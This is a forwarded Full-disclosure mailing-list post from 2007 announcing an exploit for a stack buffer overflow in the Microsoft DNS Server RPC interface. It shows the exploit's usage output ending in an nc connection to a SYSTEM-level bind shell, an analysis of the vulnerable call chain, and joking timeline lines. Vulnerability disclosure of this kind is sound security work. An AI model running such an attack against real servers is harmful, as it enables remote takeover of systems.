Thread-topic: Microsoft DNS Server Remote Code executionExploit and analysis
÷ ÉÓÈÏÄÎÏÍ ËÏÄÅ ÓÏÄÅÒÖÁÔÓÑ ÏÂßÑÓÎÅÎÉÑ ÕÑÚ×ÉÍÏÓÔÉ
> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf
> Of Andres Tarasco
> Sent: Monday, April 16, 2007 6:53 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Microsoft DNS Server Remote Code
> executionExploit and analysis
>
> Hi,
>
> im sending you the headers of the new exploit code for
> microsoft DNS servers. You can download the full source code
> exploit and analysis at:
>
> -
> <>
> or
> -
>
>
> Microsoft DNS Server Remote Code execution Exploit and analysis
> Advisory:
>
> This remote exploit works against port 445 (also Microsoft
> RPC api used)
>
> Author:
> * Mario Ballano ( mballano~gmail.com )
> * Andres Tarasco ( atarasco~gmail.com )
>
> Timeline:
> * April,12,2007: Microsoft advisory published
> * April,13,2007: POC Exploit coded
> * April,14,2007: Microsoft notified about a new attack
> vector against port 445 (this exploit code)
> * April,14,2007: Working exploit for Windows 2000 server
> SP4 (Spanish)
> * April,15,2007: Working exploit for Windows 2003 server
> SP2 (Spanish) /GS bypassed
> * April,16,2007: hackers hax the w0rld and got busted.
> * April,xx,2007: Lammer release the first buggy worm
> * Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary
> m.. being abducted were found at NSA servers
>
>
> Usage:
> D:\DNSTEST>dnstest.exe 192.168.1.7
> -------------------------------------------------------
> Microsoft Dns Server local & remote RPC Exploit code (port 445)
> Exploit code by Andres Tarasco & Mario Ballano
> Tested against Windows 2000 server SP4 and Windows 2003
> SP2 (Spanish)
> -------------------------------------------------------
>
> [+] Trying to fingerprint target.. 05 02
> [+] Remote Host identified as Windows 2003
> [+] Connecting to
> 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pi
> pe\\dnsserver]
> [+] RpcBindingFromStringBinding returned 0x0
> [+] Calling remote procedure DnssrvOperation()
> [+] Now try to connect to port 4444
>
> D:\DNSTEST>nc 192.168.1.7 4444
> Microsoft Windows [Version 5.2.3790]
> (C) Copyright 1985-2003 Microsoft Corp.
>
> C:\WINDOWS\system32>whoami
> nt authority\system
>
> Vulnerability Analysis:
>
> The function Lookup_ZoneTreeNodeFromDottedName() uses a
> fixed local buffer to convert
> a string calling Name_ConvertFileNameToCountName(), this
> string can contain back-slash
> octal characters. Although some bounds checks are done when
> writting to the buffer is
> still possible to bypass them using a string with multiple
> backslashed chars, resulting
> in a stack based buffer overflow.
>
> This function can be reached through DNS RPC Interface, the
> execution flow
> will be as follows:
>
> R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);
> // RPC Exported function
> R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
> RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
> Zone_FindZoneByName(buggybuffer);
> // Here we go!
> Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
>
> Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0);
> // Using fixed size local buffer
> extractQuotedChar(x,x,buggybuffer);
> // Extract octal number
> Disassemblies at the end of the code:
>
> References:
> - Defeating the Stack Based Buffer Overflow Prevention
> Mechanism of Microsoft Windows 2003 Server. (David
> Litchfield, NGSSoftware).
> - www.48bits.com
> -
>
> Just compile the code with nmake and have fun!
>
>
> */
>
>
